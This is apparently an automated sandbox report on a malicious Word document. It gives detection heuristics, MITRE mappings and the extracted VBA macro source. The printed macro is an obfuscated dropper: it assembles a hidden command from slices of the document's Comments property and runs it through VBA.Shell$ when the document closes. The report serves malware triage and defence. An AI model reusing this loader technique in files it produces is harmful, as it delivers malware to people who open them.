MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The Auto_Close macro is configured to execute a PowerShell command, indicated by the 'SC_STR_POWERSHELL' heuristic and the 'Shell()' call. This suggests the macro's purpose is to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.HeuristicShellOnClose-6370606-0' further supports this dropper functionality.
Heuristics 8
-
ClamAV: Doc.Dropper.HeuristicShellOnClose-6370606-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.HeuristicShellOnClose-6370606-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
RnNFqMdzqF = umvAh + ZitGUBhrFX + rzNwlWDIj + zznHLo VBA.Shell$ RnNFqMdzqF, 0 End Sub -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
End Sub Sub AutoClose() DTOLsiGSQ -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5229 bytes |
SHA-256: 239a7075559926ab49c94fe88e3e64829957026fb45bab1b5c0b32d6cc169496 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
44 of 69 identifiers look randomly generated (e.g. 'JaPabOCDnrS') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub DTOLsiGSQ()
HnDwfUkEWs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11977, 129)
zBfEn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5951, 144)
AashkRSbk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7648, 153)
pTjDWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12572, 63)
RanvzdFlj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10593, 165)
zVufuPP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6998, 53)
fNsAaLD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 376, 131)
wfjfFcGM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1558, 60)
DfficPhpunl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14147, 108)
tGCDh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14058, 27)
laQLnTo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10299, 115)
SZikTCn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10962, 161)
QktVJBpIY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3182, 6)
DYYZKJdP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6796, 199)
JaPabOCDnrS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9930, 118)
RCbPQOWf = HnDwfUkEWs + zBfEn + AashkRSbk + pTjDWz + RanvzdFlj + zVufuPP + fNsAaLD + wfjfFcGM + DfficPhpunl + tGCDh + laQLnTo + SZikTCn + QktVJBpIY + DYYZKJdP + JaPabOCDnrS
LtAJaKYYfk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2949, 106)
dvhmmF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14092, 53)
HAzHWitMAzP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 581, 71)
XOiNtccS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5220, 64)
oKszTjbj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3535, 76)
GlKutm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14394, 10)
LXhVrkG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1792, 12)
ZtcJcNdKwik = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4368, 174)
ZNoGTlDn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2341, 81)
kLGVp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13287, 45)
HqmkCqw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13714, 118)
XjjzIHri = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9234, 140)
jlRUdLF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8269, 162)
zVsoqdWtnt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12844, 142)
qGpOWEWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13099, 14)
YWVnjpW = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7408, 111)
zDHCHfss = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8915, 72)
NDpcwpfcGH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10176, 100)
pNdzVTDwh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8735, 157)
UZUjDhjiL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5499, 68)
PQiuYw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5303, 169)
PBROOt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 845, 25)
JYpXEq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9379, 182)
DcFbuXc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6529, 158)
dzMObuEvT = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9622, 175)
CKFqiXZF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5025, 160)
GZrNrwsZS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8057, 93)
WjlvMvid = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7846, 44)
livSsWPz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1295, 196)
WYzWYVBjwLV = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2824, 6)
EfbUuSb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8576, 124)
mEVqvuwZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11147, 112)
vuCwjOXr = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13860, 124)
iYFkTrmRCUi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 124, 5)
umvAh = RCbPQOWf + LtAJaKYYfk + dvhmmF + HAzHWitMAzP + XOiNtccS + oKszTjbj + GlKutm + LXhVrkG + ZtcJcNdKwik + ZNoGTlDn + kLGVp + HqmkCqw + XjjzIHri + jlRUdLF + zVsoqdWtnt + qGpOWEWz + YWVnjpW + zDHCHfss + NDpcwpfcGH + pNdzVTDwh + UZUjDhjiL + PQiuYw + PBROOt + JYpXEq + DcFbuXc + dzMObuEvT + CKFqiXZF + GZrNrwsZS + WjlvMvid + livSsWPz + WYzWYVBjwLV + EfbUuSb + mEVqvuwZ + vuCwjOXr + iYFkTrmRCUi
ZitGUBhrFX = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4116, 7)
rzNwlWDIj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 45, 1)
zznHLo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2466, 1)
RnNFqMdzqF = umvAh + ZitGUBhrFX + rzNwlWDIj + zznHLo
VBA.Shell$ RnNFqMdzqF, 0
End Sub
Sub AutoClose()
DTOLsiGSQ
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.